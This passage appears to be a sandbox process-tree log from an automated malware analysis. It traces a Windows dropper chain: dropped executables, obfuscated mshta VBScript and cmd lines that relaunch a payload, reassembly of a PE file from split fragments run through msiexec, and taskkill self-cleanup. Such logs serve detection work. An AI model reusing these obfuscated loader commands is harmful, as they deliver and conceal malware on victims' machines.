C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Users\Admin\AppData\Roaming\2045521.exe"C:\Users\Admin\AppData\Roaming\2045521.exe"3⤵PID:4048
-
-
C:\Users\Admin\AppData\Roaming\7310357.exe"C:\Users\Admin\AppData\Roaming\7310357.exe"3⤵PID:1520
-
C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"4⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Roaming\4682617.exe"C:\Users\Admin\AppData\Roaming\4682617.exe"3⤵PID:4216
-
-
C:\Users\Admin\AppData\Roaming\4183110.exe"C:\Users\Admin\AppData\Roaming\4183110.exe"3⤵PID:4376
-
-
C:\Users\Admin\AppData\Roaming\4340187.exe"C:\Users\Admin\AppData\Roaming\4340187.exe"3⤵PID:4428
-
C:\Users\Admin\AppData\Roaming\8115156.exe"C:\Users\Admin\AppData\Roaming\8115156.exe"4⤵PID:3168
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Roaming\8115156.exe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If """" =="""" for %J IN ( ""C:\Users\Admin\AppData\Roaming\8115156.exe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )5⤵PID:4784
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Roaming\8115156.exe" 96I39AZEjeY.eXe&&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "" =="" for %J IN ( "C:\Users\Admin\AppData\Roaming\8115156.exe" ) do taskkill /f /iM "%~nxJ"6⤵PID:5056
C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C87⤵PID:4172
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If ""/pHUW_5J4~bwUgHE59AL0C8 "" =="""" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )8⤵PID:5228
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" 96I39AZEjeY.eXe&&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "/pHUW_5J4~bwUgHE59AL0C8 " =="" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" ) do taskkill /f /iM "%~nxJ"9⤵PID:5448
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRiPt: ClOSE( CreATEobJeCt ( "WScRipT.sHELL" ).run ( "CMD /Q /C ECHo | Set /P = ""MZ"" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK +QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl " ,0 , tRUE ) )8⤵PID:5304
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ECHo | Set /P = "MZ" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 +8IocY82.AK +QsN7PDR.gG + 4BRi.S xW5LDH.~rl&dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl9⤵PID:5496
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHo "10⤵PID:5468
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>sGRrCYU.nK0"10⤵PID:5660
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\Xw5LDH.~Rl10⤵PID:5904
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "8115156.exe"7⤵
- Kills process with taskkill
PID:5208
C:\Users\Admin\AppData\Roaming\3860801.exe"C:\Users\Admin\AppData\Roaming\3860801.exe"4⤵PID:2128
C:\Users\Admin\AppData\Roaming\8320134.exe"C:\Users\Admin\AppData\Roaming\8320134.exe"3⤵PID:4460
C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe"C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe"2⤵
- Executes dropped EXE
PID:1912
C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe"C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe"2⤵
- Executes dropped EXE
PID:2324
C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe"C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1392
C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe"C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3796
C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"2⤵PID:4800
C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp"C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp" /SL5="$501F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"3⤵PID:4920
C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe" /S /UID=27094⤵PID:4848
C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe"C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe"5⤵PID:5772
C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe"C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe"5⤵PID:5912
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe & exit6⤵PID:4960
C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exeC:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe7⤵PID:6876
C:\Users\Admin\AppData\Local\Temp\Install1.exeC:\Users\Admin\AppData\Local\Temp\Install1.exe8⤵PID:6048
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent & exit6⤵PID:6812
C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent7⤵PID:2056
C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe" /VERYSILENT5⤵PID:6084
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6796
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6828
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7012
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3064
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7492
C:\Users\Admin\AppData\Local\Temp\84F6.exeC:\Users\Admin\AppData\Local\Temp\84F6.exe1⤵PID:8020
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:6248
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1112
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBD607D2C4D439583F58E73FC9DE3D1A C2⤵PID:7076
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6392
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7172
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5548